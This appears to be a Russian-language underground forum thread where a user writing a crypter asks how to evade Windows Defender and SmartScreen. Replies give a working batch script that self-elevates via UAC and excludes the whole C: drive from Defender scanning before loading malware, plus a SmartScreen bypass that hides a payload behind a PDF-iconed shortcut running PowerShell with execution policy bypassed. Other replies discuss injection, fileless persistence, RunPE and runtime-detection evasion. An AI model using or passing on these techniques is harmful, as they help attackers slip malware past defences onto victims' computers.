• XSS.stack #1 – первый литературный журнал от юзеров форума

Обход Windows Defender/SmartScreen - как сделать?

Volk_v_Shkure

RAID-массив
Пользователь
Регистрация
19.04.2022
Сообщения
63
Реакции
8
Доброго времени суток! Пишу криптер. Подскажите как можно обойти windows defender, а именно тот момент когда ты загружаешь exe файл на компьютер и WinDef его сканирует. Может есть ссылка на статью с описанием того как это можно реализовать.

Буду благодарен за любую информацию.
 
Последнее редактирование модератором:
Скачивай сорцы крипторов, сначала старых, потом поновее, и кури сорцы, нет нигде нормальной полноценной статьи пошаговой, которая приведет тебя к написанию FUD криптора, тем более в 2022
Сначала тебе нужно понять как обходить статику, это базис
Потом как обходить динамику, а это поведенческий анализ по большей части, сюда входит и эмуляция кода, АВ прыгает на точку входа и пошагово исполняет в виртуальном окружении твой код, попутно смотрит что он делает, ищет статичные и динамичные сигнатуры
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
можно не сидеть и не выдумывать ничего а просто написать фуд лоадер обычный загрузчик который сначала выполнит функцию добавления в исключение всего диска а после этого уже подгрузит и выполнит твою малварь.


обычный bat файл
Код:
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    goto neptyn
) else ( goto godmuyiuin )

:neptyn
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"="
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:godmuyiuin
    pushd "%CD%"
    CD /D "%~dp0"


powershell.exe -command Add-MpPreference -ExclusionPath C:\

этот батник подгружаете своим лоадером и запускаете потом делаете задержку небольшую секунд 10 чтобы батник успел сработать и после подгружаете малварь свою
 
можно не сидеть и не выдумывать ничего а просто написать фуд лоадер обычный загрузчик который сначала выполнит функцию добавления в исключение всего диска а после этого уже подгрузит и выполнит твою малварь.


обычный bat файл
Код:
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    goto neptyn
) else ( goto godmuyiuin )

:neptyn
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"="
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:godmuyiuin
    pushd "%CD%"
    CD /D "%~dp0"


powershell.exe -command Add-MpPreference -ExclusionPath C:\

этот батник подгружаете своим лоадером и запускаете потом делаете задержку небольшую секунд 10 чтобы батник успел сработать и после подгружаете малварь свою
Он не сработает без прав локального админа на хосте, в чем смысл тогда? :D
 
можно не сидеть и не выдумывать ничего а просто написать фуд лоадер обычный загрузчик который сначала выполнит функцию добавления в исключение всего диска а после этого уже подгрузит и выполнит твою малварь.
дефендер - не единственное защитное решение, которое может стоять на компе
человек спросил непосредственно про крипторы, ну обойдет он виндеф как ты написал
потом появится следующая тема от этого юзера, в стиле "пишу криптор, как обойти Avast\ESET\Каспера\ и тд и тп"
 
дефендер - не единственное защитное решение, которое может стоять на компе
человек спросил непосредственно про крипторы, ну обойдет он виндеф как ты написал
потом появится следующая тема от этого юзера, в стиле "пишу криптор, как обойти Avast\ESET\Каспера\ и тд и тп"
Ну в таком случае, блектим посоветует ему элитную приватную технику обхода ав через елку в консоли... она 100% обходит все антивири в рантайме и повышает права процесса до system
 
Ну в таком случае, блектим посоветует ему элитную приватную технику обхода ав через елку в консоли... она 100% обходит все антивири в рантайме и повышает права процесса до system
На Си такое не проктатит, только на шарпе
 
Пожалуйста, обратите внимание, что пользователь заблокирован
именно тот момент когда ты загружаешь exe файл на компьютер и WinDef его сканирует
Он, наверное, имел ввиду, что не хочет дропать файл и запускать его, чтобы последнего не отсканил авер или в облако не отправил и тд. В таком случае имеет смысл попробовать инжекты в легитимный процесс, или прописать нагрузку в виде бесфайлового персистанса и дождаться перезагрузки компа.

этот батник подгружаете своим лоадером и запускаете потом делаете задержку небольшую секунд 10 чтобы батник успел сработать и после подгружаете малварь свою
О, элитные алгоритмы подъехали, еще бы туда новогоднего настроения в батник и вообще было бы збс.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
По моему вся тенденция с криптерами идет к тому что скоро будут обфусцировать исходный код, обфусцированный код передавать сервису крипта, и уже сервис крипта по своим уникальным методом будет превращать код в фарш для любой системы отладки. Так будут криптоваться в будущем как по мне ;)
Новые обновы дефендера и сэнтинелван говорят имено об этом.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
To bypass the smart screen I use a simple technique!


* First you create an LNK(shortcut) go to properties and put this in Destination

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass ./test.ps1

* Create a test.ps1 file like that:

start Payload.exe


(Now you can put everything in a .zip or .iso file)

You can put a pdf icon in Shotcut and put the test.ps1 and Payload.exe scripts as hide

with that the blue screen of the demon will not appear!
It's an amateur technique but you can take the concept of running your Payload through a program that Windows Trusts and implement it in your favorite programming language!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
По моему вся тенденция с криптерами идет к тому что скоро будут обфусцировать исходный код, обфусцированный код передавать сервису крипта, и уже сервис крипта по своим уникальным методом будет превращать код в фарш для любой системы отладки
Не ну с дотнетами можно готовую сборку с какой-то базовой обфускацией передавать, так как с MSIL достаточно просто и удобно работать с помощью всяких dnlib'ов и Mono.Cecil'ов. А вот с нативным кодом, конечно, куда сложнее. Можно, наверное, компилировать в LLVM IR и отдавать сервису его.

ЗЫ: Блектим забанен по собственному желанию... Эх, "не вынесла душа поэта позора мелочных обид"... (с).
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ЗЫ: Блектим забанен по собственному желанию... Эх, "не вынесла душа поэта позора мелочных обид"... (с).
оффтоп: ты зачем его довел до ручки? Мне нравился этот простой, юный падован
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Блектим забанен по собственному желанию...
как мы теперь без него😢
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bypass smart screen require a signed exe with EV cert or .lnk shortcut , bypassing the windows defender on runtime there a lot of techniques old wan't work very well , private will work fine
 
По моему вся тенденция с криптерами идет к тому что скоро будут обфусцировать исходный код, обфусцированный код передавать сервису крипта, и уже сервис крипта по своим уникальным методом будет превращать код в фарш для любой системы отладки. Так будут криптоваться в будущем как по мне ;)
Новые обновы дефендера и сэнтинелван говорят имено об этом.
а разве сейчас криптует по другому? Шифрование строк в стабе зла бинарника(если они подготовлены для этого) или исходника, потом обфускация исходного кода стаба криптера с внедрением шифрованного тела стаба зла, потом обфускация анти-все и компиляция - на выходе ехе в 5 раз выше размером чем стаб-зла, но не палится ничем. Проблемы могут быть только с рантаймом стаба-зла.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Проблемы могут быть только с рантаймом стаба-зла.
Я про рантайм и говорил. Эра криптеров XOR подходит к концу. А когда этот конец наступит - не понятно. Тренды так или иначе задают мелкомягкие. Нас ждет новое поколение обфускаторов исходных кодов которые сбивают рантайм сигнатуры, как не крути.
 
Я про рантайм и говорил. Эра криптеров XOR подходит к концу. А когда этот конец наступит - не понятно. Тренды так или иначе задают мелкомягкие. Нас ждет новое поколение обфускаторов исходных кодов которые сбивают рантайм сигнатуры, как не крути.
только одно НО, обфускато то как помогут обойти рантайм? рантайм срабатывает на параметры винапи и последовательность этих же самих винапи, а параметры ну скажим так мягко говоря шибко не обфусцируешь чтобы код не здох. А на простые действия xor sub add mov и еще с ним АВ давно забили, они сейчас смотрят общуюю энтропию рабочего кода и все, на сам же код внимания не обращают к примеру тот же детект Variant в разных интерпритациях значит что слишком много кода asm: mov или на c++: = и не соответствует общей масс call вызовов функций +winapi функций, а то что там приравнимается АВ наплевать. Второй общий фактор анализа - это взаимосвязь команд, т.е. мусора в исполняемом коде не должно быть вообще, т.к. АВ знают что все компиляторы этот мусор вычищают и оптимизируют. Более бдительно АВ смотрят секцию констант и переменных смотрят строки. По факту на текущий момент АВ выходят на общий детект и уже даже лень им называть вирусы, просто дают Variant.148473 название. Так это к чему я это все что уже давно антивирусы не ставят детекты на xor и еже с ними, НО отдать им должно на рантайме они не сосредотачиваются, т.к. понимаю что если начать жестко детектить винапи функций 6-10 - то вирусы исчезныт и у них не будет работы ))) к примеру RunPE до сих пор работает без рантайм детекта - ну это же бля бред, ДрВеб только на него реагирует и то не уверен сейчас.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
только одно НО, обфускато то как помогут обойти рантайм?
смотря кто что вкладывает в понятие слова "обфускатор". надеюсь меня не будут тыкать носом в википедию? :D

то вирусы исчезныт и у них не будет работы
я думал тут всем и так понятно зачем это делается) и дело тут не в том что у них работы не будет) кто понял тот понял

RunPE до сих пор работает без рантайм детекта - ну это же бля бред, ДрВеб только на него реагирует и то не уверен сейчас
еще какой...
 
Пожалуйста, обратите внимание, что пользователь заблокирован
рантайм срабатывает на параметры винапи и последовательность этих же самих винапи, а параметры ну скажим так мягко говоря шибко не обфусцируешь чтобы код не здох
Ну обфускатор, как и в принципе криптор, может переделать вызовы апи на вызов сискола, не то чтобы это много от чего поможет, но просто, как пример.
 
Ну обфускатор, как и в принципе криптор, может переделать вызовы апи на вызов сискола, не то чтобы это много от чего поможет, но просто, как пример.
тогда уж проще ручками переделать в исходники пару функций чем что то городить - делов 10 минут, новый рантайм детект очень редко и долго создают, его много раз тестируют если уж очень надо, а то какая нить софтина крупного ит гиганта ласты склеит по глупости АВ потом проблем не оберутся. А на живую бинарник паределывтаь под сискол - ну это извращение.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх